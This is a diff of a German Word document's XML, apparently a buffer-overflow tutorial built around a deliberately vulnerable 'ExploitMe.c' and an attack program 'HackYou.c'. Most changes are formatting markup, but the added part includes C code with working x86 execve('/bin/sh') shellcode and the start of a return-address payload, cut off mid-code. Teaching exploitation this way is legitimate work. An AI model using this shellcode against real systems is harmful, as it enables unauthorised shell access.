       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Remember</w:t>
@@ -443,6 +2597,7 @@
       <w:r>
         <w:t xml:space="preserve"> Layout</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -470,14 +2625,16 @@
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:223.9pt;height:287.2pt" o:ole="">
             <v:imagedata r:id="rId9" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411819137" r:id="rId10"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1413023287" r:id="rId10"/>
         </w:object>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc339281406"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -487,6 +2644,7 @@
       <w:r>
         <w:t xml:space="preserve"> Layout unseres angreifbaren Programms</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -495,7 +2653,7 @@
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
             <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411819138" r:id="rId12"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1413023288" r:id="rId12"/>
         </w:object>
       </w:r>
     </w:p>
@@ -503,9 +2661,11 @@
       <w:pPr>
         <w:pStyle w:val="berschrift3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc339281407"/>
       <w:r>
         <w:t>Beobachtungen</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -551,11 +2711,13 @@
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc339281408"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Shellcode</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="6"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
@@ -627,6 +2789,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc339281409"/>
       <w:r>
         <w:t xml:space="preserve">Code in </w:t>
       </w:r>
@@ -638,6 +2801,7 @@
       <w:r>
         <w:t xml:space="preserve"> umwandeln</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1333,6 +3497,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc339281410"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ExitShellcode</w:t>
@@ -1341,6 +3506,7 @@
       <w:r>
         <w:t xml:space="preserve"> ausführen</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1893,15 +4059,6 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="berschrift3"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Analyse mit GDB</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -1962,14 +4119,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -2045,14 +4215,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - ESP </w:t>
       </w:r>
@@ -2126,14 +4309,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
       </w:r>
@@ -2200,14 +4396,27 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -2244,6 +4453,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc339281411"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -2253,6 +4463,7 @@
       <w:r>
         <w:t xml:space="preserve"> zum Öffnen einer Shell schreiben</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2962,6 +5173,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc339281412"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Stack</w:t>
@@ -2978,6 +5190,7 @@
       <w:r>
         <w:t>() betrachten</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -2986,7 +5199,7 @@
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
             <v:imagedata r:id="rId17" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411819139" r:id="rId18"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1413023289" r:id="rId18"/>
         </w:object>
       </w:r>
     </w:p>
@@ -2994,6 +5207,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc339281413"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Assembler </w:t>
@@ -3002,6 +5216,7 @@
       <w:r>
         <w:t>Equivalent</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="11"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -4026,6 +6241,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc339281414"/>
       <w:r>
         <w:t xml:space="preserve">Probleme mit diesem </w:t>
       </w:r>
@@ -4033,6 +6249,7 @@
       <w:r>
         <w:t>Shellcode</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="12"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
@@ -4163,6 +6380,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc339281415"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Benutzbaren </w:t>
@@ -4183,6 +6401,7 @@
       <w:r>
         <w:t>() erstellen</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -4191,7 +6410,7 @@
           <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:532.5pt;height:366.35pt" o:ole="">
             <v:imagedata r:id="rId20" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1411819140" r:id="rId21"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1413023290" r:id="rId21"/>
         </w:object>
       </w:r>
     </w:p>
@@ -5898,6 +8117,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc339281416"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -5911,6 +8131,7 @@
       <w:r>
         <w:t>ExploitMe.c</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
@@ -6430,6 +8651,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc339281417"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Stack</w:t>
@@ -6442,6 +8664,7 @@
       <w:r>
         <w:t>ExploitMe.c</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
@@ -6451,7 +8674,7 @@
           <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:453.35pt;height:155.1pt" o:ole="">
             <v:imagedata r:id="rId22" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1411819141" r:id="rId23"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1413023291" r:id="rId23"/>
         </w:object>
       </w:r>
     </w:p>
@@ -6470,6 +8693,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc339281418"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Wie können wir das ausnutzen(</w:t>
@@ -6482,6 +8706,7 @@
       <w:r>
         <w:t>)</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -6498,7 +8723,7 @@
           <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:607.65pt;height:400.35pt" o:ole="">
             <v:imagedata r:id="rId24" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1411819142" r:id="rId25"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1413023292" r:id="rId25"/>
         </w:object>
       </w:r>
     </w:p>
@@ -6506,6 +8731,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc339281419"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Konzept von </w:t>
@@ -6514,6 +8740,7 @@
       <w:r>
         <w:t>HackYou.c</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="17"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
@@ -6665,18 +8892,4966 @@
         <w:t xml:space="preserve"> auf ihn zeigen lassen.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
     <w:p>
       <w:r>
         <w:object w:dxaOrig="10129" w:dyaOrig="2759">
           <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:453.35pt;height:123.45pt" o:ole="">
             <v:imagedata r:id="rId26" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1411819143" r:id="rId27"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1413023293" r:id="rId27"/>
         </w:object>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc339281420"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78EDC8B5" wp14:editId="5539D0A6">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225425</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>612566</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5372100" cy="4119036"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="15240"/>
+                <wp:wrapNone/>
+                <wp:docPr id="19" name="Textfeld 19"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5372100" cy="4119036"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdlib.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>string.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">// </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ripped</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>from</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> http://www.milw0rm.com/shellcode/444</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[]=</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x31\xc0"                      // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xorl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">     %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>,%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x50"                          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>pushl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">    %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x68\x6e\x2f\x73\x68"          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>pushl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">    $0x68732f6e</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x68\x2f\x2f\x62\x69"          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>pushl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">    $0x69622f2f</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x89\xe3"                      // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">     %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>,%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x99"                          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>cltd</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x52"                          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>pushl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">    %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>edx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x53"                          // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>pushl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">    %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\x89\xe1"                      // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">     %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>esp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>,%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ecx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">"\xb0\x0b"                      // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">     $0xb</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramStart"/>
+                            <w:r>
+                              <w:t>,%</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:t>al</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>"\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xcd</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">\x80"                      // </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">      $0x80</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>retaddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\xf8\xd6\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
